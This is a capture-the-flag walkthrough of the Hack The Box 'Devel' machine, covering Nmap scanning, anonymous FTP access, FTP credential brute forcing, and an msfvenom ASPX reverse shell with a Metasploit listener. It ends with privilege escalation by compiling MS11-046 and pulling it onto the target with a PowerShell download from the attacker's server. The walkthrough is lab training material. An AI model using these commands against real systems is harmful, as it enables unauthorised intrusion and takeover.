search

Devel Walkthrough

Hey folks, welcome to Devel machine from Hack The Box,arrow-up-right letโ€™s get started with the machineโ€™s info.

Okay, thatโ€™s fine. Itโ€™s easy to level but has very useful ideas and thatโ€™s weโ€™re targeting is โ€œLearn new ideas & techniques every dayโ€. Letโ€™s get startedโ€ฆ

hashtag
Steps

  1. DNS Enumeration

  2. Website Enumeration

  3. Exploitation

  4. Post-Exploitation

  5. Submit flags & Celebrate

hashtag

hashtag
DNS Enumeration

In this step, we need to know the MAC address, open ports, port services, OS version, etc

use Nmap to get the above information

nmap -sV -O -T4 10.10.10.5

  • -sV โ†’ get the service version

  • -O โ†’ OS detection

  • -T4 โ†’ increase the thread's โ€œincrease speedโ€

Or you can use -A to detect versions, services, scripts, etc. To know more, use -h option to see the optionโ€™s details

from the output, you should note that we have 2 ports open http(80) and ftp(21) and thereโ€™s a dangerous thing Anonymous FTP login allowed It means that anyone can log in to FTP server without credentials

The second thing you should note that there are information web app directories is available (content discovery)

Take notes of all this information like the OS version.

hashtag
Website Enumeration

Letโ€™s move to the webpage http://10.10.10.5 but thereโ€™s nothing important and by using dirsearch you will gain nothing more than the directories which nmap return.

Letโ€™s try to login to the server by FTP server

ftp 10.10.10.5 It will ask you for credentials but if you donโ€™t type anything you will login successfully as you can see

The next step is will try to upload a file to the server and access it through the website, to know the allowed commands, type help and you will find put commands which upload files to the server

we will create a text file just for testing test.html and try to upload it

the upload commands put test.html but unfortunately, you will receive an error message that you must login as an authenticated user. And to know the users and passwords in the ftp server, you can brute force its credentials by BruteSprayarrow-up-right the tool. This tool needs a file nmap with an extension .gnmap to get it โ†’ nmap -A -T4 -o file_name.gnmap + brutespray -f file_name.gnmap. The results:

Now we have 2 accounts username:anonymous & password: 12345 and username: anonymous & password: 111111. Now login with these credentials

try to upload the file again with the same method, and itโ€™ll work

and then access it through the webpage 10.10.10.5/test.html

Good, Itโ€™s worked. letโ€™s generate the reverse shell by using msfvenom

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=<your-ip-address> LPORT=4444 -o devel.aspx

  • -p โ†’ payload, to see all payloads msfvenom -l payloads

  • -f โ†’ file format, to see all formats msfvenom -l formats

  • -o โ†’ output file

the next step is to upload it as you uploaded the html file. Iโ€™ll upload it and check that itโ€™s uploaded successfully

hashtag
Exploitation

The next step is to create a listener on my machine to listen for the reversed connection, you can create the listener by netcat or metasploit. Remember that we listen on port 4444

netcat โ†’ nc -lvp 4444 But Iโ€™ll use metasploit to capture the connection

  1. use multi/handler

  2. set payload windows/shell_reverse_tcp

  3. set LHOST <your-ip-address>

  4. set LPORT 4444

  5. show options to check that all this information is set successfully

  6. run to start the listener

after it, you will access the shell through the webpage 10.10.10.5/devel.aspx. You will notice that thereโ€™s a meterpreter opened in the metasploit as you can see

hashtag
Post-Exploitation

now weโ€™re in the main server, letโ€™s search for any text files related to usersโ€ฆ

Unfortunately, thereโ€™s nothing here, letโ€™s dig more into the server directories.

Into c:\Users you will find 2 directories Administrator and babis

now, we will try to access them but unfortunately, you need to be root

So, we will get more info about the machine to search for exploitation by typing sysinfo

The machine is Windows 7 (6.1 Build 7600) x86.

After searching about exploitation, I found one on exploit-dbarrow-up-right and the same one in this repoarrow-up-right. Itโ€™s a C code so it needs to compile it (The method is mentioned in the code itself)

We need to install mingw64 by this command apt-get install mingw64 then compile it i686-w64-mingw32-gcc MS11โ€“046.c -o MS11โ€“046.exe -lws2_32

Now we need to transfer the compiled file to the machine to execute it so we will deal with the local machine as the server and the vuln machine as client as follow

On the local machine (Kali) python -m SimpleHttpServer 8888

On the vuln machine, we try to use netcatbut unfortunately, itโ€™s not installed

so we will use powershell โ†’ powershell -c "(new-object System.Net.WebClient('http://<your-ip-address>:8888/MS11โ€“046.exe', 'c:\Users\Public\Downloads')"

Good, Itโ€™s worked and the request from the vuln machine in the logs as you can see.

letโ€™s see our role whoami !! Good we now have root privileges.

Letโ€™s search for the flag files in the c:\Users\Administrator\Desktop โ†’ root flag and c:\Users\babis\Desktop โ†’ user flag

Root flag

User flag

Congrats โค

hashtag
Stay in touch

LinkedInarrow-up-right | GitHubarrow-up-right | Twitterarrow-up-right

PreviousTime WalkthroughNextLame Walkthrough

Last updated